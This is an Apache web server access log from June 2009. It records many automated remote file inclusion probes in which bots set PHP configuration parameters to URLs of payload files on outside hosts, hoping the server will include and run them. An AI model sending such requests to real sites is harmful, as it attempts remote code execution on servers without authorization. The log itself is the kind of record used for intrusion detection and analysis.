222.122.142.249 - - [20/Jun/2009:00:18:18 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:00:18:18 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:18:24 -0400] "GET /logs/access_log.Q109051300%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:00:18:29 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_custompages&cpage=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.134.74 - - [20/Jun/2009:00:18:34 -0400] "GET /logs/access_log.Q109052200//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.191.89.138 - - [20/Jun/2009:00:18:41 -0400] "GET /logs/access_log.Q109052200%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:18:46 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:18:46 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 6248 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:18:46 -0400] "GET /logs/access_log.Q109051600%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
174.142.68.168 - - [20/Jun/2009:00:18:47 -0400] "GET /logs/access_log.Q109050700%20//admin/classes/TplLoad.php?full_path_to_public_program=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:18:47 -0400] "GET /logs/error_log.Q108062800%20//admin/classes/TplLoad.php?full_path_to_public_program=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
124.0.146.100 - - [20/Jun/2009:00:19:05 -0400] "GET /logs/error_log.Q109051900%20%20//index.php?autoLoadConfig%5b999%5d%5b0%5d%5bautoType%5d=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:19:16 -0400] "GET /logs/access_log.Q109052500%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:00:19:22 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.249.134.74 - - [20/Jun/2009:00:19:46 -0400] "GET /logs/access_log.Q109051300%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.108.67.89 - - [20/Jun/2009:00:19:53 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.bestcursos.com.br/admin/w/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.812"
66.249.134.74 - - [20/Jun/2009:00:20:02 -0400] "GET /logs/access_log.Q109052200%20%20//com_virtuemart/export.php?mosConfig_absolute_path=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:20:32 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:00:20:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [20/Jun/2009:00:21:33 -0400] "GET /logs/error_log.Q109061200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
124.0.145.1 - - [20/Jun/2009:00:21:47 -0400] "GET /logs/access_log.Q109051600/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:21:57 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:21:57 -0400] "GET /logs/error_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:21:57 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:22:04 -0400] "GET /logs/access_log.Q109052500/inc/functions.inc.php?config[ppa_root_path]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:22:06 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:22:08 -0400] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:22:08 -0400] "GET /logs/error_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:22:08 -0400] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:22:08 -0400] "GET /logs/access_log.Q109061300/contenido/classes/class.inuse.php?cfg[path][contenido]=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:23:16 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:23:17 -0400] "GET /logs/default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:23:17 -0400] "GET /logs/access_log.Q109053100%20%20/default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:23:17 -0400] "GET /default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:23:36 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:24:11 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:24:11 -0400] "GET /logs/access_log.Q109061100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:24:11 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:24:12 -0400] "GET /logs/access_log.Q109052300%20%20/default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:00:24:54 -0400] "GET /logs/include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:00:24:54 -0400] "GET /include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:00:24:54 -0400] "GET /logs/access_log.Q109051800%20%20/include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:25:11 -0400] "GET /logs/access_log.Q109060100%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:25:11 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:25:11 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:00:25:18 -0400] "GET /logs/access_log.Q109051300%20%20/include/write.php?dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:25:25 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:25:25 -0400] "GET /logs/access_log.Q109060100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:25:55 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:25:55 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:00:25:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.142.68.168 - - [20/Jun/2009:00:26:34 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:26:34 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:26:35 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:26:35 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
195.64.174.74 - - [20/Jun/2009:00:26:48 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.64.174.74 - - [20/Jun/2009:00:26:49 -0400] "GET //?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.11.230.36 - - [20/Jun/2009:00:26:54 -0400] "GET /logs/access_log.Q109061100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:26:54 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:26:54 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:26:56 -0400] "GET /logs/access_log.Q109051500//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:26:56 -0400] "GET //?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:26:56 -0400] "GET /logs//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 200 6247 "-" "libwww-perl/5.803"
66.11.230.36 - - [20/Jun/2009:00:27:42 -0400] "GET /logs/access_log.Q109060100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:27:59 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
200.105.207.244 - - [20/Jun/2009:00:28:00 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:00:28:00 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:28:35 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:28:35 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:00:28:35 -0400] "GET /logs/access_log.Q109061100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:29:25 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:29:25 -0400] "GET //components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:29:25 -0400] "GET /logs//components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
62.149.226.223 - - [20/Jun/2009:00:29:30 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:29:35 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.124.194.104 - - [20/Jun/2009:00:29:43 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:00:29:43 -0400] "GET /logs//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.810"
74.124.194.104 - - [20/Jun/2009:00:29:43 -0400] "GET //include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
195.64.174.74 - - [20/Jun/2009:00:29:56 -0400] "GET //components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
123.143.98.5 - - [20/Jun/2009:00:29:58 -0400] "GET /logs/access_log.Q109010700/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:29:58 -0400] "GET /index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:29:58 -0400] "GET /logs/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:29:59 -0400] "GET /index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:29:59 -0400] "GET /logs/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:29:59 -0400] "GET /logs/access_log.Q109010700/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:30:05 -0400] "GET /logs/access_log.Q109052800/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:00:30:06 -0400] "GET /logs/access_log.Q109052800/index.php?str=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.124.194.104 - - [20/Jun/2009:00:30:10 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
78.159.121.30 - - [20/Jun/2009:00:30:19 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:00:30:19 -0400] "GET //include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
78.159.121.30 - - [20/Jun/2009:00:30:19 -0400] "GET /logs//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
124.0.145.1 - - [20/Jun/2009:00:30:36 -0400] "GET /logs/access_log.Q109060100%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:00:30:37 -0400] "GET /logs/error_log.Q109021300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
78.159.121.30 - - [20/Jun/2009:00:30:46 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://www.vasterviksdjurklinik.se/components/chid.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
75.125.245.26 - - [20/Jun/2009:00:30:54 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:30:54 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:31:00 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
62.149.226.223 - - [20/Jun/2009:00:32:05 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:32:05 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:32:05 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:00:32:36 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:32:39 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:32:39 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:00:32:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.125.245.26 - - [20/Jun/2009:00:33:18 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:33:18 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:33:18 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:33:19 -0400] "GET //?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
83.98.209.71 - - [20/Jun/2009:00:33:21 -0400] "GET /logs/access_log.Q109050300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:33:34 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:00:33:34 -0400] "GET /convert/mvcw.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
124.138.156.3 - - [20/Jun/2009:00:33:50 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:33:51 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:33:51 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:33:56 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:00:33:59 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:34:15 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:00:34:27 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:00:34:37 -0400] "GET /logs/access_log.Q109052500//components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.73.164.205 - - [20/Jun/2009:00:34:40 -0400] "GET /logs/access_log.Q109050300//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:00:34:41 -0400] "GET /logs/access_log.Q109050300//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:00:34:42 -0400] "GET /logs/access_log.Q109050300//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.130.17 - - [20/Jun/2009:00:34:50 -0400] "GET /logs/access_log.Q109053100/default.php?arquivo=http://omit.ru/yandex_628dc1f3167e2080.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:00:34:54 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.125.245.26 - - [20/Jun/2009:00:35:06 -0400] "GET /logs/access_log.Q109061200%20%20/lostpasswd.php?env[include_prefix]=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.142.68.168 - - [20/Jun/2009:00:35:13 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
174.142.68.168 - - [20/Jun/2009:00:35:13 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://free.7host05.com/tachatte69/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
